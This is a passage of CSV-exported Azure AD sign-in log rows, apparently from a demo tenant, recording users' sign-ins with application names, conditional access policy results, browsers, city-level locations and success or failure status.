+62,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:55.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,9de52e56-e2df-4c5d-80b7-4ddaa05d4b35,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Azure Advanced Threat Protection,7b7531ad-5926-4f2d-8a1d-38495ad33e17,Browser,[],notApplied,08/04/2020 23:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",93d4df14-2ec3-46f2-a774-ff583b490600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Azure Advanced Threat Protection,93d4df14-2ec3-46f2-a774-ff583b490600,SigninLogs,Failed,41.90428925,-85.99833679
+63,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:36.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 13:59,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",6d9cea8b-fbf7-41d5-8285-85bac2221400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,6d9cea8b-fbf7-41d5-8285-85bac2221400,SigninLogs,Sucess,50.6406517,5.572050095
+64,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:26.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f0b8d587-28e9-432b-b34a-9e3fa2ca09ed,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5fa972fe-7fa8-4b4b-bbdd-e6020a2f1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5fa972fe-7fa8-4b4b-bbdd-e6020a2f1900,SigninLogs,Sucess,33.7984581,-84.38828278
+65,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:23.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,55ed0380-304b-4009-82ab-0a1d14aab9c7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",17ea6265-ad23-4765-8c42-0b9fc11f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,17ea6265-ad23-4765-8c42-0b9fc11f1800,SigninLogs,Sucess,36.6404686,-78.26995087
+66,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:49.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,da89de0d-bd6b-468a-98d5-a14013718456,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 16:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",e8341e6f-1218-4a7d-a265-4d3442b54e00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e8341e6f-1218-4a7d-a265-4d3442b54e00,SigninLogs,Sucess,32.32146072,34.85319901
+67,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,77382391-98ca-42e2-b85b-bc435603ac00,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",581df607-a3b5-4d26-ad1e-df5262d21800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,581df607-a3b5-4d26-ad1e-df5262d21800,SigninLogs,Sucess,33.7984581,-84.38828278
+68,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:07.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f21c479f-a0e1-0000-5593-c4731da7d03e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5b07faad-beec-46e1-ae61-d56dbe361a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5b07faad-beec-46e1-ae61-d56dbe361a00,SigninLogs,Sucess,33.7984581,-84.38828278
+69,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:05.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d751bb85-e820-4c12-adf1-c0f528ecca0d,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 05:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b3c0863d-787e-45d0-a1b5-da54acc70a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da54acc70a00,SigninLogs,Sucess,36.6404686,-78.26995087
+70,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:22.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a9c027ed-3114-4636-a76c-de3b671181f0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 